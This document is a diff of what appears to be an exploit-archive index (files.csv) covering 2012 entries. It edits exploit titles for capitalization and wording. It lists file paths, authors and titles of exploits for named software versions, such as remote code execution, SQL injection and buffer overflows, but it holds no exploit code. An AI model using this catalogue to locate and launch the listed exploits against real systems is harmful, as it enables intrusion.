18435,platforms/php/webapps/18435.txt,"phpShowtime - Directory Traversal",2012-01-31,"Red Security TEAM",php,webapps,0 18436,platforms/linux/dos/18436.txt,"sudo 1.8.0 - 1.8.3p1 Format String",2012-01-31,joernchen,linux,dos,0 18434,platforms/php/webapps/18434.txt,"Snort Report 1.3.2 - SQL Injection",2012-01-31,"a.kadir altan",php,webapps,0 -18437,platforms/windows/remote/18437.txt,"Adobe Flash Player - MP4 SequenceParameterSetNALUnit Remote Code Execution Exploit",2012-01-31,Abysssec,windows,remote,0 +18437,platforms/windows/remote/18437.txt,"Adobe Flash Player - MP4 SequenceParameterSetNALUnit Remote Code Execution",2012-01-31,Abysssec,windows,remote,0 18438,platforms/php/webapps/18438.txt,"Ez Album - Blind SQL Injection",2012-01-31,"Red Security TEAM",php,webapps,0 18439,platforms/php/webapps/18439.txt,"PragmaMX 1.2.10 - Persistent Cross-Site Scripting",2012-01-31,HauntIT,php,webapps,0 18440,platforms/windows/dos/18440.txt,"EdrawSoft Office Viewer Component ActiveX 5.6 - (officeviewermme.ocx) Buffer Overflow (PoC)",2012-01-31,LiquidWorm,windows,dos,0 @@ -15989,7 +15990,7 @@ id,file,description,date,author,platform,type,port 18444,platforms/php/webapps/18444.txt,"sit! support incident tracker 3.64 - Multiple Vulnerabilities",2012-02-01,"High-Tech Bridge SA",php,webapps,0 18446,platforms/android/remote/18446.html,"Webkit Normalize Bug - Android 2.2",2012-02-01,"MJ Keith",android,remote,0 18447,platforms/asp/webapps/18447.txt,"MailEnable Webmail - Cross-Site Scripting",2012-01-13,"Sajjad Pourali",asp,webapps,0 -18448,platforms/windows/remote/18448.rb,"Sunway Forcecontrol - SNMP NetDBServer.exe Opcode 0x57",2012-02-02,Metasploit,windows,remote,0 +18448,platforms/windows/remote/18448.rb,"Sunway ForceControl - SNMP NetDBServer.exe Opcode 0x57",2012-02-02,Metasploit,windows,remote,0 18449,platforms/windows/remote/18449.rb,"Icona SpA C6 Messenger - DownloaderActiveX Control Arbitrary File Download and Execute",2012-02-02,Metasploit,windows,remote,0 18451,platforms/windows/webapps/18451.txt,"Sphinix Mobile Web Server 3.1.2.47 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-02-02,"SecPod Research",windows,webapps,0 18452,platforms/multiple/webapps/18452.txt,"Apache Struts - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-02-02,"SecPod Research",multiple,webapps,0 @@ -16021,12 +16022,12 @@ id,file,description,date,author,platform,type,port 18499,platforms/hardware/webapps/18499.txt,"D-Link DSL-2640B - (ADSL Router) Cross-Site Request Forgery",2012-02-20,"Ivano Binetti",hardware,webapps,0 18485,platforms/windows/remote/18485.rb,"Java MixerSequencer Object - GM_Song Structure Handling",2012-02-16,Metasploit,windows,remote,0 18487,platforms/php/webapps/18487.html,"SocialCMS 1.0.2 - Cross-Site Request Forgery",2012-02-16,"Ivano Binetti",php,webapps,0 -18488,platforms/windows/dos/18488.txt,"Novell GroupWise Messenger 2.1.0 - Arbitrary Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 -18489,platforms/windows/dos/18489.txt,"Novell GroupWise Messenger 2.1.0 - Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 -18490,platforms/windows/dos/18490.txt,"Novell GroupWise Messenger Client 2.1.0 - Unicode Stack Overflow",2012-02-16,"Luigi Auriemma",windows,dos,0 +18488,platforms/windows/dos/18488.txt,"Novell Groupwise Messenger 2.1.0 - Arbitrary Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 +18489,platforms/windows/dos/18489.txt,"Novell Groupwise Messenger 2.1.0 - Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 +18490,platforms/windows/dos/18490.txt,"Novell Groupwise Messenger Client 2.1.0 - Unicode Stack Overflow",2012-02-16,"Luigi Auriemma",windows,dos,0 18491,platforms/windows/dos/18491.txt,"xnview 1.98.5 - Multiple Vulnerabilities",2012-02-16,"Luigi Auriemma",windows,dos,0 18492,platforms/linux/remote/18492.rb,"Horde 3.3.12 - Backdoor Arbitrary PHP Code Execution",2012-02-17,Metasploit,linux,remote,0 -18493,platforms/windows/dos/18493.py,"PCAnywhere 12.5.0 build 463 - Denial of Service",2012-02-17,"Johnathan Norman",windows,dos,0 +18493,platforms/windows/dos/18493.py,"pcAnywhere 12.5.0 build 463 - Denial of Service",2012-02-17,"Johnathan Norman",windows,dos,0 18494,platforms/php/webapps/18494.txt,"Pandora Fms 4.0.1 - Local File Inclusion",2012-02-17,Vulnerability-Lab,php,webapps,0 18495,platforms/php/webapps/18495.html,"almnzm 2.4 - Cross-Site Request Forgery (Add Admin)",2012-02-18,"HaNniBaL KsA",php,webapps,0 18497,platforms/php/webapps/18497.txt,"4PSA CMS - SQL Injection",2012-02-19,"BHG Security Center",php,webapps,0 @@ -16041,13 +16042,13 @@ id,file,description,date,author,platform,type,port 18506,platforms/php/webapps/18506.txt,"BRIM < 2.0.0 - SQL Injection",2012-02-22,ifnull,php,webapps,0 18520,platforms/windows/remote/18520.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (2012)",2012-02-24,Metasploit,windows,remote,0 18507,platforms/windows/dos/18507.py,"DAMN Hash Calculator 1.5.1 - Local Heap Overflow (PoC)",2012-02-22,"Julien Ahrens",windows,dos,0 -18508,platforms/php/webapps/18508.txt,"Limesurvey (PHPSurveyor 1.91+ stable) - Blind SQL Injection",2012-02-22,TorTukiTu,php,webapps,0 +18508,platforms/php/webapps/18508.txt,"LimeSurvey (PHPSurveyor 1.91+ stable) - Blind SQL Injection",2012-02-22,TorTukiTu,php,webapps,0 18513,platforms/php/webapps/18513.txt,"DFLabs PTK 1.0.5 - (Steal Authentication Credentials) Multiple Vulnerabilities",2012-02-22,"Ivano Binetti",php,webapps,0 18509,platforms/hardware/webapps/18509.html,"Dlink DCS series - Cross-Site Request Forgery Change Admin Password",2012-02-22,rigan,hardware,webapps,0 18510,platforms/windows/webapps/18510.txt,"WebcamXP and webcam 7 - Directory Traversal",2012-02-22,Silent_Dream,windows,webapps,0 18511,platforms/hardware/webapps/18511.txt,"D-Link DSL-2640B - Authentication Bypass",2012-02-22,"Ivano Binetti",hardware,webapps,0 18512,platforms/windows/dos/18512.txt,"Unity 3D Web Player 3.2.0.61061 - Denial of Service",2012-02-22,"Luigi Auriemma",windows,dos,0 -18514,platforms/windows/remote/18514.rb,"TrendMicro Control Manger 5.5 - CmdProcessor.exe Stack Buffer Overflow",2012-02-23,Metasploit,windows,remote,0 +18514,platforms/windows/remote/18514.rb,"Trend Micro Control Manger 5.5 - CmdProcessor.exe Stack Buffer Overflow",2012-02-23,Metasploit,windows,remote,0 18515,platforms/windows/local/18515.rb,"Orbit Downloader - URL Unicode Conversion Overflow",2012-02-23,Metasploit,windows,local,0 18516,platforms/php/webapps/18516.txt,"phpDenora 1.4.6 - Multiple SQL Injections",2012-02-23,NLSecurity,php,webapps,0 18517,platforms/hardware/webapps/18517.txt,"Snom IP Phone - Privilege Escalation",2012-02-23,"Sense of Security",hardware,webapps,0 @@ -16055,19 +16056,19 @@ id,file,description,date,author,platform,type,port 18518,platforms/php/webapps/18518.rb,"The Uploader 2.0.4 - (English/Italian) Remote File Upload Remote Code Execution (Metasploit)",2012-02-23,"Danny Moules",php,webapps,0 18521,platforms/windows/remote/18521.rb,"HP Data Protector 6.1 - EXEC_CMD Remote Code Execution",2012-02-25,Metasploit,windows,remote,0 18522,platforms/php/webapps/18522.php,"cPassMan 1.82 - Remote Command Execution Exploit",2012-02-25,ls,php,webapps,0 -18523,platforms/php/webapps/18523.txt,"webgrind 1.0 - (file parameter) Local File Inclusion",2012-02-25,LiquidWorm,php,webapps,0 +18523,platforms/php/webapps/18523.txt,"webgrind 1.0 - (file Parameter) Local File Inclusion",2012-02-25,LiquidWorm,php,webapps,0 18524,platforms/windows/dos/18524.py,"Tiny HTTP Server 1.1.9 - Remote Crash (PoC)",2012-02-25,localh0t,windows,dos,0 18526,platforms/php/webapps/18526.php,"YVS Image Gallery - SQL Injection",2012-02-25,CorryL,php,webapps,0 18527,platforms/php/webapps/18527.txt,"ContaoCMS (aka TYPOlight) 2.11 - Cross-Site Request Forgery (Delete Admin / Delete Article)",2012-02-26,"Ivano Binetti",php,webapps,0 18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 - '.pls' Stack Buffer Overflow",2012-03-02,Metasploit,windows,local,0 18531,platforms/windows/remote/18531.html,"Mozilla Firefox 4.0.1 - Array.reduceRight() Exploit",2012-02-27,pa_kt,windows,remote,0 18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Buffer Overflow",2012-02-27,Vulnerability-Lab,windows,local,0 -18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 - SFTP Post-Authenticated SEH Exploit",2012-02-27,"Craig Freyman",windows,remote,0 -18535,platforms/windows/remote/18535.py,"Sysax 5.53 - SSH Username Buffer Overflow Pre-Authenticated Remote Code Execution (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0 +18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 - SFTP Post-Authentication SEH Exploit",2012-02-27,"Craig Freyman",windows,remote,0 +18535,platforms/windows/remote/18535.py,"Sysax 5.53 - SSH Username Buffer Overflow Pre-Authentication Remote Code Execution (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0 18536,platforms/php/webapps/18536.txt,"WebfolioCMS 1.1.4 - Cross-Site Request Forgery (Add Admin/Modify Pages)",2012-02-28,"Ivano Binetti",php,webapps,0 18702,platforms/php/webapps/18702.txt,"Hotel Booking Portal - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0 18538,platforms/windows/remote/18538.rb,"ASUS Net4Switch - ipswcom.dll ActiveX Stack Buffer Overflow",2012-02-29,Metasploit,windows,remote,0 -18539,platforms/windows/remote/18539.rb,"IBM Personal Communications I-Series Access WorkStation 5.9 - Profile",2012-02-29,Metasploit,windows,remote,0 +18539,platforms/windows/remote/18539.rb,"IBM Personal Communications I-Series Access Workstation 5.9 - Profile",2012-02-29,Metasploit,windows,remote,0 18540,platforms/hardware/webapps/18540.txt,"Yealink VOIP Phone - Persistent Cross-Site Scripting",2012-02-29,"Narendra Shinde",hardware,webapps,0 18541,platforms/windows/dos/18541.py,"Netmechanica NetDecision HTTP Server - Denial of Service",2012-02-29,"SecPod Research",windows,dos,0 18542,platforms/windows/remote/18542.txt,"Netmechanica NetDecision Traffic Grapher Server - Information Disclosure",2012-02-29,"SecPod Research",windows,remote,0 @@ -16087,18 +16088,18 @@ id,file,description,date,author,platform,type,port 18556,platforms/php/webapps/18556.txt,"Endian UTM Firewall 2.4.x & 2.5.0 - Multiple Web Vulnerabilities",2012-03-03,Vulnerability-Lab,php,webapps,0 18557,platforms/windows/remote/18557.rb,"Sysax 5.53 - SSH Username Buffer Overflow (Metasploit)",2012-03-04,Metasploit,windows,remote,0 18558,platforms/php/webapps/18558.txt,"DZCP (deV!L_z Clanportal) Witze Addon 0.9 - SQL Injection",2012-03-04,"Easy Laster",php,webapps,0 -18559,platforms/php/webapps/18559.txt,"AneCMS 2e2c583 - Local File Inclusion Exploit",2012-03-04,"I2sec-Jong Hwan Park",php,webapps,0 +18559,platforms/php/webapps/18559.txt,"AneCMS 2e2c583 - Local File Inclusion",2012-03-04,"I2sec-Jong Hwan Park",php,webapps,0 18566,platforms/asp/webapps/18566.txt,"Iciniti Store - SQL Injection",2012-03-07,"Sense of Security",asp,webapps,0 18567,platforms/windows/webapps/18567.txt,"HomeSeer HS2 and HomeSeer PRO - Multiple Vulnerabilities",2012-03-07,Silent_Dream,windows,webapps,0 18703,platforms/windows/remote/18703.txt,"Quest Toad for Oracle Explain Plan Display ActiveX Control - (QExplain2.dll 6.6.1.1115) Remote File Creation / Overwrite (PoC)",2012-04-05,rgod,windows,remote,0 18600,platforms/multiple/dos/18600.txt,"presto! pagemanager 9.01 - Multiple Vulnerabilities",2012-03-14,"Luigi Auriemma",multiple,dos,0 18601,platforms/multiple/dos/18601.txt,"EMC NetWorker 7.6 sp3 - Denial of Service",2012-03-14,"Luigi Auriemma",multiple,dos,0 18571,platforms/php/webapps/18571.txt,"promise webpam 2.2.0.13 - Multiple Vulnerabilities",2012-03-07,LiquidWorm,php,webapps,0 -18572,platforms/windows/remote/18572.rb,"Adobe Flash Player - .mp4 'cprt' Overflow",2012-03-08,Metasploit,windows,remote,0 +18572,platforms/windows/remote/18572.rb,"Adobe Flash Player - '.mp4' 'cprt' Overflow",2012-03-08,Metasploit,windows,remote,0 18575,platforms/php/webapps/18575.txt,"RazorCMS 1.2.1 Stable - Cross-Site Request Forgery (Delete Web Pages)",2012-03-08,"Ivano Binetti",php,webapps,0 -18578,platforms/php/webapps/18578.txt,"PHP Address Book 6.2.12 - Multiple security vulnerabilities",2012-03-10,"Stefan Schurtz",php,webapps,0 +18578,platforms/php/webapps/18578.txt,"PHP Address Book 6.2.12 - Multiple security Vulnerabilities",2012-03-10,"Stefan Schurtz",php,webapps,0 18574,platforms/php/webapps/18574.txt,"RazorCMS 1.2.1 STABLE - Arbitrary File Upload",2012-03-08,"i2sec_Hyo jun Oh",php,webapps,0 -18579,platforms/linux/dos/18579.txt,"PyPAM - Python bindings for PAM - Double Free Corruption",2012-03-10,"Markus Vervier",linux,dos,0 +18579,platforms/linux/dos/18579.txt,"PyPAM - Python bindings for PAM - Double-Free Corruption",2012-03-10,"Markus Vervier",linux,dos,0 18582,platforms/cgi/webapps/18582.txt,"Zend Server 5.6.0 - Multiple Remote Script Insertion Vulnerabilities",2012-03-12,LiquidWorm,cgi,webapps,0 18583,platforms/php/webapps/18583.txt,"Saman Portal - Local File Inclusion",2012-03-12,TMT,php,webapps,0 18584,platforms/windows/dos/18584.txt,"GOM Media Player 2.1.37 - Buffer Overflow",2012-03-12,longrifle0x,windows,dos,0 @@ -16109,7 +16110,7 @@ id,file,description,date,author,platform,type,port 18618,platforms/php/webapps/18618.pl,"Joomla 2.5.0-2.5.1 - Time Based SQL Injection",2012-03-19,"A. Ramos",php,webapps,0 18619,platforms/multiple/remote/18619.txt,"Apache Tomcat - Remote Exploit (PUT Request) and Account Scanner",2012-03-19,kingcope,multiple,remote,0 18589,platforms/php/webapps/18589.txt,"Acal Calendar 2.2.6 - Cross-Site Request Forgery",2012-03-12,"Number 7",php,webapps,0 -18595,platforms/php/webapps/18595.txt,"Max GuestBook 1.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 +18595,platforms/php/webapps/18595.txt,"Max Guestbook 1.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 18590,platforms/php/webapps/18590.txt,"PBLang - Local File Inclusion",2012-03-13,"Number 7",php,webapps,0 18591,platforms/php/webapps/18591.txt,"Cycade Gallery - SQL Injection",2012-03-13,-DownFall,php,webapps,0 18592,platforms/php/webapps/18592.txt,"4Images - Image Gallery Management System - Cross-Site Request Forgery",2012-03-13,"Dmar al3noOoz",php,webapps,0 @@ -16122,7 +16123,7 @@ id,file,description,date,author,platform,type,port 18605,platforms/windows/webapps/18605.txt,"sockso 1.5 - Directory Traversal",2012-03-15,"Luigi Auriemma",windows,webapps,0 18606,platforms/windows/dos/18606.txt,"Microsoft Terminal Services - Use-After-Free (MS12-020)",2012-03-16,"Luigi Auriemma",windows,dos,0 18607,platforms/php/webapps/18607.txt,"OneFileCMS 1.1.5 - Local File Inclusion",2012-03-16,mr.pr0n,php,webapps,0 -18608,platforms/php/webapps/18608.txt,"FlexCMS 3.2.1 - Persistent Cross-Site Scripting for logged in users",2012-03-16,storm,php,webapps,0 +18608,platforms/php/webapps/18608.txt,"FlexCMS 3.2.1 - Persistent Cross-Site Scripting",2012-03-16,storm,php,webapps,0 18609,platforms/php/webapps/18609.txt,"FlexCMS 3.2.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2012-03-16,"Ivano Binetti",php,webapps,0 18610,platforms/windows/remote/18610.pl,"Tiny Server 1.1.5 - Arbitrary File Disclosure Exploit",2012-03-16,KaHPeSeSe,windows,remote,0 18611,platforms/windows/local/18611.rb,"RM Downloader 3.1.3.3.2010.06.26 - '.m3u' Buffer Overflow (Metasploit)",2012-03-16,KaHPeSeSe,windows,local,0 @@ -16136,13 +16137,13 @@ id,file,description,date,author,platform,type,port 18623,platforms/windows/remote/18623.txt,"LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server - Arbitrary File Deletion",2012-03-19,rgod,windows,remote,0 18624,platforms/windows/remote/18624.txt,"2X Client for RDP 10.1.1204 - ClientSystem Class ActiveX Control Download and Execute",2012-03-19,rgod,windows,remote,0 18625,platforms/windows/remote/18625.txt,"2X ApplicationServer 10.1 - TuxSystem Class ActiveX Control Remote File Overwrite",2012-03-19,rgod,windows,remote,0 -18626,platforms/jsp/webapps/18626.txt,"ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet - Unauthenticated Remote Directory Traversal",2012-03-19,rgod,jsp,webapps,0 +18626,platforms/jsp/webapps/18626.txt,"ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet - Unauthenticated Directory Traversal",2012-03-19,rgod,jsp,webapps,0 18628,platforms/windows/dos/18628.py,"PeerFTP Server 4.01 - Remote Crash (PoC)",2012-03-20,localh0t,windows,dos,0 18629,platforms/windows/dos/18629.py,"Tiny Server 1.1.9 - HTTP HEAD Denial of Service",2012-03-20,"brock haun",windows,dos,0 18630,platforms/android/dos/18630.txt,"Android FTPServer 1.9.0 - Remote Denial of Service",2012-03-20,G13,android,dos,0 18631,platforms/php/webapps/18631.txt,"OneForum - 'topic.php' SQL Injection",2012-03-20,"Red Security TEAM",php,webapps,0 18932,platforms/linux/remote/18932.py,"Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion (Root Remote Code Execution) Exploit",2012-05-26,muts,linux,remote,0 -18633,platforms/windows/dos/18633.txt,"Adobe Photoshop 12.1 - .tiff Parsing Use-After-Free",2012-03-20,"Francis Provencher",windows,dos,0 +18633,platforms/windows/dos/18633.txt,"Adobe Photoshop 12.1 - '.tiff' Parsing Use-After-Free",2012-03-20,"Francis Provencher",windows,dos,0 18634,platforms/windows/remote/18634.rb,"Dell Webcam CrazyTalk - ActiveX BackImage",2012-03-21,Metasploit,windows,remote,0 18636,platforms/windows/dos/18636.txt,"Oreans Themida 2.1.8.0 - TMD File Handling Buffer Overflow",2012-03-21,LiquidWorm,windows,dos,0 18637,platforms/windows/dos/18637.txt,"Oreans WinLicense 2.1.8.0 - XML File Handling Unspecified Memory Corruption",2012-03-21,LiquidWorm,windows,dos,0 @@ -16157,18 +16158,18 @@ id,file,description,date,author,platform,type,port 18647,platforms/php/webapps/18647.txt,"PHP Grade Book 1.9.4 - Unauthenticated SQL Database Export",2012-03-22,"Mark Stanislav",php,webapps,0 18648,platforms/php/webapps/18648.txt,"phpMoneyBooks 1.0.2 - Local File Inclusion",2012-03-22,"Mark Stanislav",php,webapps,0 18649,platforms/php/webapps/18649.txt,"FreePBX 2.10.0 / 2.9.0 - Multiple Vulnerabilities",2012-03-22,"Martin Tschirsich",php,webapps,0 -18650,platforms/php/webapps/18650.py,"FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution Exploit",2012-03-23,muts,php,webapps,0 +18650,platforms/php/webapps/18650.py,"FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution",2012-03-23,muts,php,webapps,0 18651,platforms/asp/webapps/18651.txt,"Sitecom WLM-2501 new - Multiple Cross-Site Request Forgery Vulnerabilities",2012-03-23,"Ivano Binetti",asp,webapps,0 18652,platforms/php/webapps/18652.txt,"Wolfcms 0.75 - (Cross-Site Request Forgery / Cross-Site Scripting) Multiple Vulnerabilities",2012-03-23,"Ivano Binetti",php,webapps,0 18654,platforms/windows/dos/18654.txt,"Spotify 0.8.2.610 - (search func) Memory Exhaustion Exploit",2012-03-23,LiquidWorm,windows,dos,0 18655,platforms/php/webapps/18655.php,"PHPFox 3.0.1 - (ajax.php) Remote Command Execution Exploit",2012-03-23,EgiX,php,webapps,0 18656,platforms/windows/local/18656.pl,"mmPlayer 2.2 - '.m3u' Local Buffer Overflow (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0 -18657,platforms/windows/local/18657.pl,"mmPlayer 2.2 - (.ppl) Local Buffer Overflow (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0 +18657,platforms/windows/local/18657.pl,"mmPlayer 2.2 - '.ppl' Local Buffer Overflow (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0 18695,platforms/windows/remote/18695.py,"Sysax 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0 18658,platforms/windows/remote/18658.rb,"Ricoh DC DL-10 SR10 - FTP USER Command Buffer Overflow",2012-03-24,Metasploit,windows,remote,0 18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 - callmenum Remote Code Execution",2012-03-24,Metasploit,php,webapps,0 18660,platforms/php/webapps/18660.txt,"RIPS 0.53 - Multiple Local File Inclusion",2012-03-24,localh0t,php,webapps,0 -18661,platforms/windows/dos/18661.txt,"RealPlayer .mp4 - file handling memory corruption",2012-03-24,"Senator of Pirates",windows,dos,0 +18661,platforms/windows/dos/18661.txt,"RealPlayer .mp4 - file handling memory Corruption",2012-03-24,"Senator of Pirates",windows,dos,0 18676,platforms/php/webapps/18676.txt,"boastMachine 3.1 - Cross-Site Request Forgery (Add Admin)",2012-03-28,Dr.NaNo,php,webapps,0 18670,platforms/php/webapps/18670.txt,"PicoPublisher 2.0 - SQL Injection",2012-03-28,ZeTH,php,webapps,0 18666,platforms/windows/remote/18666.rb,"UltraVNC 1.0.2 Client - (vncviewer.exe) Buffer Overflow",2012-03-26,Metasploit,windows,remote,0 @@ -16191,14 +16192,14 @@ id,file,description,date,author,platform,type,port 18687,platforms/php/webapps/18687.txt,"Landshop 0.9.2 - Multiple Web Vulnerabilities",2012-03-31,Vulnerability-Lab,php,webapps,0 18688,platforms/hardware/dos/18688.txt,"EMC Data Protection Advisor 5.8.1 - Denial of Service",2012-03-31,"Luigi Auriemma",hardware,dos,0 18689,platforms/php/webapps/18689.txt,"Woltlab Burning Board 2.2 / 2.3 - [WN]KT KickTipp 3.1 - SQL Injection",2012-03-31,"Easy Laster",php,webapps,0 -18690,platforms/php/webapps/18690.txt,"Buddypress plugin of Wordpress - SQL Injection",2012-03-31,"Ivan Terkin",php,webapps,0 +18690,platforms/php/webapps/18690.txt,"BuddyPress plugin of WordPress - SQL Injection",2012-03-31,"Ivan Terkin",php,webapps,0 18691,platforms/windows/dos/18691.rb,"FoxPlayer 2.6.0 - Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",windows,dos,0 18692,platforms/linux/dos/18692.rb,"SnackAmp 3.1.3 - '.aiff' Denial of Service",2012-04-01,"Ahmed Elhady Mohamed",linux,dos,0 18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - SEH & DEP & ASLR",2012-04-03,b33f,windows,local,0 18694,platforms/php/webapps/18694.txt,"Simple PHP Agenda 2.2.8 - Cross-Site Request Forgery (Add Admin / Add Event)",2012-04-03,"Ivano Binetti",php,webapps,0 18708,platforms/php/webapps/18708.txt,"GENU CMS - SQL Injection",2012-04-05,"hordcode security",php,webapps,0 18709,platforms/windows/remote/18709.rb,"TRENDnet SecurView Internet Camera - UltraMJCam OpenFileDlg Buffer Overflow",2012-04-06,Metasploit,windows,remote,0 -18710,platforms/windows/local/18710.rb,"Csound - .hetro File Handling Stack Buffer Overflow",2012-04-06,Metasploit,windows,local,0 +18710,platforms/windows/local/18710.rb,"Csound - '.hetro' File Handling Stack Buffer Overflow",2012-04-06,Metasploit,windows,local,0 18711,platforms/php/webapps/18711.txt,"w-cms 2.0.1 - Multiple Vulnerabilities",2012-04-06,Black-ID,php,webapps,0 18714,platforms/windows/remote/18714.rb,"LANDesk Lenovo ThinkManagement Console - Remote Command Execution",2012-04-08,Metasploit,windows,remote,0 18715,platforms/multiple/webapps/18715.rb,"Liferay XSL - Command Execution (Metasploit)",2012-04-08,"Spencer McIntyre",multiple,webapps,0 @@ -16206,14 +16207,14 @@ id,file,description,date,author,platform,type,port 18719,platforms/windows/dos/18719.pl,"Play [EX] 2.1 - Playlist File (M3U/PLS/LST) Denial of Service",2012-04-08,Death-Shadow-Dark,windows,dos,0 18720,platforms/php/webapps/18720.txt,"Utopia News Pro 1.4.0 - Cross-Site Request Forgery Add Admin",2012-04-08,Dr.NaNo,php,webapps,0 18771,platforms/windows/dos/18771.txt,"SumatraPDF 2.0.1 - '.chm' / '.mobi' Memory Corruption",2012-04-23,shinnai,windows,dos,0 -18722,platforms/cgi/webapps/18722.txt,"ZTE - Change Admin password",2012-04-08,"Nuevo Asesino",cgi,webapps,0 -18723,platforms/multiple/remote/18723.rb,"Snort 2 - DCE/RPC preprocessor Buffer Overflow",2012-04-09,Metasploit,multiple,remote,0 -18724,platforms/php/webapps/18724.rb,"Dolibarr ERP & CRM 3 - Post-Authenticated OS Command Injection",2012-04-09,Metasploit,php,webapps,0 +18722,platforms/cgi/webapps/18722.txt,"ZTE - Change Admin Password",2012-04-08,"Nuevo Asesino",cgi,webapps,0 +18723,platforms/multiple/remote/18723.rb,"Snort 2 - DCE/RPC Preprocessor Buffer Overflow",2012-04-09,Metasploit,multiple,remote,0 +18724,platforms/php/webapps/18724.rb,"Dolibarr ERP & CRM 3 - Post-Authentication OS Command Injection",2012-04-09,Metasploit,php,webapps,0 18725,platforms/php/webapps/18725.txt,"Dolibarr ERP & CRM - OS Command Injection",2012-04-09,"Nahuel Grisolia",php,webapps,0 18726,platforms/windows/local/18726.py,"Mini-stream RM-MP3 Converter 3.1.2.2 - Local Buffer Overflow",2012-04-09,"SkY-NeT SySteMs",windows,local,0 18727,platforms/windows/remote/18727.rb,"IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 - ActiveX RunAndUploadFile() Method Overflow",2012-04-10,Metasploit,windows,remote,0 -18728,platforms/php/webapps/18728.txt,"joomla component The Estate Agent (com_estateagent) - SQL Injection",2012-04-10,xDarkSton3x,php,webapps,0 -18729,platforms/php/webapps/18729.txt,"joomla component (com_bearleague) - SQL Injection",2012-04-10,xDarkSton3x,php,webapps,0 +18728,platforms/php/webapps/18728.txt,"joomla Component The Estate Agent (com_estateagent) - SQL Injection",2012-04-10,xDarkSton3x,php,webapps,0 +18729,platforms/php/webapps/18729.txt,"joomla Component (com_bearleague) - SQL Injection",2012-04-10,xDarkSton3x,php,webapps,0 18732,platforms/php/webapps/18732.txt,"Software DEP Classified Script 2.5 - SQL Injection",2012-04-12,"hordcode security",php,webapps,0 18733,platforms/linux/local/18733.py,"WICD - Local Privilege Esclation Exploit",2012-04-12,anonymous,linux,local,0 18734,platforms/hardware/dos/18734.txt,"EMC IRM License Server 4.6.1.1995 - Denial of Service",2012-04-12,"Luigi Auriemma",hardware,dos,0 @@ -16221,54 +16222,54 @@ id,file,description,date,author,platform,type,port 18736,platforms/php/webapps/18736.txt,"Invision Power Board 3.3.0 - Local File Inclusion",2012-04-13,waraxe,php,webapps,0 18737,platforms/php/webapps/18737.txt,"Ushahidi 2.2 - Multiple Vulnerabilities",2012-04-13,shpendk,php,webapps,0 18738,platforms/php/remote/18738.rb,"V-CMS - PHP File Upload and Execute",2012-04-14,Metasploit,php,remote,0 -18739,platforms/windows/dos/18739.txt,"IrfanView FlashPix PlugIn - Decompression Heap Overflow",2012-04-14,"Francis Provencher",windows,dos,0 -18749,platforms/osx/local/18749.py,"Office 2008 sp0 - RTF Pfragments MAC Exploit",2012-04-18,"Abhishek Lyall",osx,local,0 -18741,platforms/php/webapps/18741.txt,"joomla component (com_ponygallery) - SQL Injection",2012-04-15,xDarkSton3x,php,webapps,0 +18739,platforms/windows/dos/18739.txt,"Irfanview FlashPix PlugIn - Decompression Heap Overflow",2012-04-14,"Francis Provencher",windows,dos,0 +18749,platforms/osx/local/18749.py,"Office 2008 sp0 - RTF pFragments MAC Exploit",2012-04-18,"Abhishek Lyall",osx,local,0 +18741,platforms/php/webapps/18741.txt,"joomla Component (com_ponygallery) - SQL Injection",2012-04-15,xDarkSton3x,php,webapps,0 18742,platforms/php/webapps/18742.php,"NetworX CMS - Cross-Site Request Forgery (Add Admin)",2012-04-15,N3t.Crack3r,php,webapps,0 18743,platforms/php/webapps/18743.txt,"MediaXxx Adult Video / Media Script - SQL Injection",2012-04-15,"Daniel Godoy",php,webapps,0 18745,platforms/multiple/webapps/18745.txt,"ManageEngine Support Center Plus 7903 - Multiple Vulnerabilities",2012-04-15,xistence,multiple,webapps,0 -18747,platforms/windows/local/18747.rb,"CyberLink Power2Go - name attribute (p2g) Stack Buffer Overflow",2012-04-18,Metasploit,windows,local,0 +18747,platforms/windows/local/18747.rb,"CyberLink Power2Go - name Attribute (p2g) Stack Buffer Overflow",2012-04-18,Metasploit,windows,local,0 18748,platforms/windows/local/18748.rb,"GSM SIM Editor 5.15 - Buffer Overflow",2012-04-18,Metasploit,windows,local,0 18750,platforms/multiple/webapps/18750.txt,"Scrutinizer NetFlow & sFlow Analyzer - Multiple Vulnerabilities",2012-04-19,"Trustwave's SpiderLabs",multiple,webapps,0 18751,platforms/hardware/dos/18751.txt,"Samsung D6000 TV - Multiple Vulnerabilities",2012-04-19,"Luigi Auriemma",hardware,dos,0 18752,platforms/php/webapps/18752.txt,"newscoop 3.5.3 - Multiple Vulnerabilities",2012-04-19,"High-Tech Bridge SA",php,webapps,0 18753,platforms/php/webapps/18753.txt,"XOOPS 2.5.4 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-19,"High-Tech Bridge SA",php,webapps,0 